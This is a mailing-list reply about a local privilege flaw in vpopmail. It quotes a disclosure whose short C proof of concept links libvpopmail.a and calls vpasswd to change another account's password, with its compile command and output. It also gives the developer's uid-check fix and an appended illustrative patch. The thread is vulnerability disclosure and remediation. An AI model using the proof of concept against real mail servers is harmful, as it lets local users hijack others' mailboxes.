Oh man. Good idea you looked at this.

The solution isn't changing the access to the libraries.
It should be in the vauth modules to check for the uid
in the vauth_setpw and vauth_vpasswd functions.

I've fixed and tested it in 4.8.7

http://www.vpopmail.cx/vpopmail-4.8.7.tar.gz

You wouldn't see the problem using the cdb authentication
module, since the cdb module requires access to files
that are protected by vpopmail permissions.

However it does show up in the other auth modules:
vmysql.c vsybase.c voracle.c

I put in checks for uid using the getuid call.
The user has to be either vpopmail or root.

Ken Jones

"Sean P. Scanlon" wrote:
> 
> [ Apologies if this has been previously covered ]
> 
> Maybe I'm a bit paranoid..
> I know most people don't run shell/mail services on the same machine,
> but if you did, it is possible for non-admin accounts to change the password
> of pop accounts.
> 
> The simple fix is to chmod 0700 ~vpopmail/lib, which will prevent linking
> with the libvpopmail.a library.
> 
> --vpop_sec_test.c--
> #include <stdio.h>
> #include <sys/time.h>
> #include <vpopmail.h>
> #include <vauth.h>
> 
> extern int vpasswd( char *, char *, char *, int);
> 
> int main(void) {
> 
>   /* the fourth parameter is an int, so pass 0 rather than NULL */
>   if ( (vpasswd("user", "domain.net", "mynewpasswd", 0) ) == 0 ){
>     printf("changed passwd\n");
>   }
>   return 0;
> }
> --vpop_sec_test.c--
> 
> $gcc -o test vpop_sec_test.o /home/vpopmail/lib/libvpopmail.a -L/usr/local/mysql/lib
> -lmysqlclient -lsocket -lnsl -lm
> 
> $./test
> changed passwd
> $
> 
> --
> -------------------------
> Sean P. Scanlon
> [EMAIL PROTECTED]
> -------------------------
> 
> "Personally, I think hashes are gods greatest gift to the programmer. I
> love them. If I could turn my wife into one, I would. "
>                                 -seen in 'comp.lang.perl.misc'
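The uid gate Ken describes for the vauth modules, as an added illustration that is not vpopmail's own code: a constructed in-memory password table stands in for the SQL/cdb backends, and the names VPOPMAIL_USER, uid_allowed and guarded_setpw are assumptions, not vpopmail identifiers.

```c
/* Added illustration of the uid check Ken describes; not vpopmail's code.
 * stored_pw is a constructed stand-in for the backend's stored password. */
#include <errno.h>
#include <pwd.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define VPOPMAIL_USER "vpopmail"  /* owner of ~vpopmail (assumed account name) */
#define PW_MAX 64

static char stored_pw[PW_MAX] = "old-secret";   /* constructed sample value */

/* Policy from Ken's fix: only root (uid 0) or the vpopmail uid may proceed. */
int uid_allowed(uid_t caller, uid_t vpopmail_uid)
{
    return caller == 0 || caller == vpopmail_uid;
}

/* Resolve VPOPMAIL_USER to a uid; returns -1 if the account is missing,
 * which callers must treat as "deny" (fail closed). */
int lookup_vpopmail_uid(uid_t *out)
{
    struct passwd *pw = getpwnam(VPOPMAIL_USER);
    if (pw == NULL) return -1;
    *out = pw->pw_uid;
    return 0;
}

/* Password update with the gate in front. `caller` is injected so the policy
 * can be exercised unprivileged; real code passes getuid() as Ken did.
 * Returns 0 on success, -1 with errno = EACCES when the caller is refused. */
int guarded_setpw(uid_t caller, uid_t vpopmail_uid, const char *newpw)
{
    if (!uid_allowed(caller, vpopmail_uid)) { errno = EACCES; return -1; }
    snprintf(stored_pw, sizeof stored_pw, "%s", newpw);  /* backend write */
    return 0;
}

const char *current_pw(void) { return stored_pw; }

int main(void)
{
    uid_t vuid;
    if (lookup_vpopmail_uid(&vuid) != 0) {          /* no such account: deny */
        fprintf(stderr, "no %s account; refusing\n", VPOPMAIL_USER);
        return 1;
    }
    if (guarded_setpw(getuid(), vuid, "mynewpasswd") != 0) perror("setpw");
    else puts("changed passwd");
    return 0;
}
```

Note that getuid() returns the real uid, so a setuid-to-vpopmail helper run by an ordinary shell user is still refused by this check; geteuid() would be the call to use if such a helper is meant to pass.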
